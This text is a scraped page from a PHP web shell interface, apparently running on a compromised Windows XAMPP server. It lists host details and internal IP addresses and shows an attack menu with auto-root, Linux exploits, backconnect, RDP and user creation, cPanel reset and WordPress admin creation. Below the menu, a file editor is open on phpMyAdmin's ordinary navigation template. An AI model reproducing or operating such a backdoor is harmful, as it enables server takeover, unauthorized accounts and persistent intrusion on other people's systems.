Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
xampp7 /
phpMyAdmin /
templates /
navigation /
[ HOME SHELL ]
Name
Size
Permission
Action
tree
[ DIR ]
drwxrwxrwx
item_unhide_dialog.twig
982
B
-rw-rw-rw-
main.twig
3.5
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : main.twig
{% if not is_ajax %} <div id="pma_navigation"> <div id="pma_navigation_resizer"></div> <div id="pma_navigation_collapser"></div> <div id="pma_navigation_content"> <div id="pma_navigation_header"> <a class="hide navigation_url" href="navigation.php{{ get_common({'ajax_request': true}) }}"></a> {% if logo.is_displayed %} <div id="pmalogo"> {% if logo.has_link %} <a href="{{ logo.link|default('#') }}"{{ logo.attributes }}> {% endif %} {% if logo.source is not empty %} <img id="imgpmalogo" src="{{ logo.source }}" alt="phpMyAdmin"> {% else %} <h1>phpMyAdmin</h1> {% endif %} {% if logo.has_link %} </a> {% endif %} </div> {% endif %} <div id="navipanellinks"> <a href="index.php{{ get_common() }}" title="{% trans 'Home' %}"> {{- get_image('b_home', 'Home'|trans) -}} </a> {% if server != 0 %} <a class="logout disableAjax" href="logout.php{{ get_common() }}" title="{{ auth_type == 'config' ? 'Empty session data'|trans : 'Log out'|trans }}"> {{- get_image('s_loggoff', auth_type == 'config' ? 'Empty session data'|trans : 'Log out'|trans) -}} </a> {% endif %} <a href="{{ get_docu_link('index') }}" title="{% trans 'phpMyAdmin documentation' %}" target="_blank" rel="noopener"> {{- get_image('b_docs', 'phpMyAdmin documentation'|trans) -}} </a> <a href="{{ get_mysql_docu_url('') }}" title="{% trans 'Documentation' %}" target="_blank" rel="noopener noreferrer"> {{- get_image('b_sqlhelp', 'Documentation'|trans) -}} </a> <a id="pma_navigation_settings_icon"{{ not is_navigation_settings_enabled ? ' class="hide"' }} href="#" title="{% trans 'Navigation panel settings' %}"> {{- get_image('s_cog', 'Navigation panel settings'|trans) -}} </a> <a id="pma_navigation_reload" href="#" title="{% trans 'Reload navigation panel' %}"> {{- get_image('s_reload', 'Reload navigation panel'|trans) -}} </a> </div> {% if is_servers_displayed and servers|length > 1 %} <div id="serverChoice"> {{ server_select|raw }} </div> {% endif %} {{ get_image('ajax_clock_small', 'Loading…'|trans, { 'style': 'visibility: hidden; display:none', 'class': 'throbber' }) }} </div> <div id="pma_navigation_tree" class="list_container{{ is_synced ? ' synced' }}{{ is_highlighted ? ' highlight' }}{{ is_autoexpanded ? ' autoexpand' }}"> {% endif %} {% if not navigation_tree %} {{ 'An error has occurred while loading the navigation display'|trans|error }} {% else %} {{ navigation_tree|raw }} {% endif %} {% if not is_ajax %} </div> <div id="pma_navi_settings_container"> {% if is_navigation_settings_enabled %} {{ navigation_settings|raw }} {% endif %} </div> </div> {% if is_drag_drop_import_enabled %} <div class="pma_drop_handler"> {% trans 'Drop files here' %} </div> <div class="pma_sql_import_status"> <h2> {% trans 'SQL upload' %} ( <span class="pma_import_count">0</span> ) <span class="close">x</span> <span class="minimize">-</span> </h2> <div></div> </div> {% endif %} </div> {% endif %}
Close